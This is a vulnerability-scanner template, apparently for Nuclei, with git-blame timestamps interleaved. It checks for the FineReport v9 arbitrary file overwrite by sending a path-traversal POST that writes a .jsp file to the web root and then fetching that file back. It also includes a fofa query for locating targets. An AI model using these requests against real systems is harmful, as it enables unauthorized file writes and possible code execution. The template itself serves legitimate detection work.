2023-08-22 11:27:51 +00:00
|
|
|
id: fine-report-v9-file-upload
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: FineReport v9 Arbitrary File Overwrite
|
|
|
|
author: SleepingBag945
|
|
|
|
severity: critical
|
|
|
|
reference:
|
2023-08-22 11:33:04 +00:00
|
|
|
- https://github.com/NHPT/WebReportV9Exp/blob/main/WebReport_Exp.
|
|
|
|
metadata:
|
|
|
|
fofa-query: app="帆软-FineReport"
|
2023-08-22 11:31:02 +00:00
|
|
|
tags: finereport,fileupload,intrusive
|
2023-08-22 11:27:51 +00:00
|
|
|
|
|
|
|
variables:
|
|
|
|
string: '{{rand_base(8, "abc")}}'
|
2023-08-23 13:20:56 +00:00
|
|
|
filename: '{{rand_base(8)}}'
|
2023-08-22 11:27:51 +00:00
|
|
|
|
|
|
|
http:
|
|
|
|
- raw:
|
|
|
|
- |
|
2023-08-23 13:20:56 +00:00
|
|
|
POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/{{filename}}.jsp HTTP/1.1
|
2023-08-22 11:27:51 +00:00
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: text/xml;charset=UTF-8
|
|
|
|
|
|
|
|
{"__CONTENT__":"{{string}}","__CHARSET__":"UTF-8"}
|
|
|
|
|
|
|
|
- |
|
2023-08-23 13:20:56 +00:00
|
|
|
GET /WebReport/{{filename}}.jsp HTTP/1.1
|
2023-08-22 11:27:51 +00:00
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body_2
|
|
|
|
words:
|
|
|
|
- "{{string}}"
|